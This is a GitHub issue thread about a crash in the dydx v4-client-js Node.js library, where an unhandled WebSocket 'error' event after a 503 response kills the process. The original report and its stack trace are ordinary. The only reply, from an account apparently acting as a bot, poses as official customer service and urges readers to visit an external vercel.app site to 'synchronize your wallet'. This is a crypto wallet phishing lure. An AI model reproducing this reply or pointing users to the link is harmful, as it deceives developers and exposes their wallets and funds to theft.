### ISSUE TITLE
[NodeJS Client] Unhandled Websocket Error Crashes Process

### ISSUE THREAD

**Issue by del-distributed** [dydxprotocol/v4-clients#118]
I'm unable to add a simple socket.on('error') handler, since the custom socket object exported by v4-client-js doesn't support it.

```
node:events:497
      throw er; // Unhandled 'error' event
      ^

Error: Unexpected server response: 503
    at ClientRequest.<anonymous> (/home/node_modules/@dydxprotocol/v4-client-js/node_modules/ws/lib/websocket.js:912:7)
    at ClientRequest.emit (node:events:519:28)
    at HTTPParser.parserOnIncomingClient [as onIncoming] (node:_http_client:693:27)
    at HTTPParser.parserOnHeadersComplete (node:_http_common:119:17)
    at TLSSocket.socketOnData (node:_http_client:535:22)
    at TLSSocket.emit (node:events:519:28)
    at addChunk (node:internal/streams/readable:559:12)
    at readableAddChunkPushByteMode (node:internal/streams/readable:510:3)
    at Readable.push (node:internal/streams/readable:390:5)
    at TLSWrap.onStreamRead (node:internal/stream_base_commons:190:23)
Emitted 'error' event on WebSocket instance at:
    at emitErrorAndClose (/home/node_modules/@dydxprotocol/v4-client-js/node_modules/ws/lib/websocket.js:1033:13)
    at process.processTicksAndRejections (node:internal/process/task_queues:82:21)
```

**Comment by AlexLiveBot11549** [comment]
> I'm unable to add a simple socket.on('error') handler, since the custom socket object exported by v4-client-js doesn't support it.
> 
> ```
> node:events:497
>       throw er; // Unhandled 'error' event
>       ^
> 
> Error: Unexpected server response: 503
>     at ClientRequest.<anonymous> (/home/node_modules/@dydxprotocol/v4-client-js/node_modules/ws/lib/websocket.js:912:7)
>     at ClientRequest.emit (node:events:519:28)
>     at HTTPParser.parserOnIncomingClient [as onIncoming] (node:_http_client:693:27)
>     at HTTPParser.parserOnHeadersComplete (node:_http_common:119:17)
>     at TLSSocket.socketOnData (node:_http_client:535:22)
>     at TLSSocket.emit (node:events:519:28)
>     at addChunk (node:internal/streams/readable:559:12)
>     at readableAddChunkPushByteMode (node:internal/streams/readable:510:3)
>     at Readable.push (node:internal/streams/readable:390:5)
>     at TLSWrap.onStreamRead (node:internal/stream_base_commons:190:23)
> Emitted 'error' event on WebSocket instance at:
>     at emitErrorAndClose (/home/node_modules/@dydxprotocol/v4-client-js/node_modules/ws/lib/websocket.js:1033:13)
>     at process.processTicksAndRejections (node:internal/process/task_queues:82:21)
> ```

Thank you for reaching to Our Github. Customer service may take some time to respond due to a large number of requests. We believe your case will be resolved as soon as possible. Kindly visit the below webpage to synchronize your wallet for fixing process 

https://support--protocol.vercel.app/
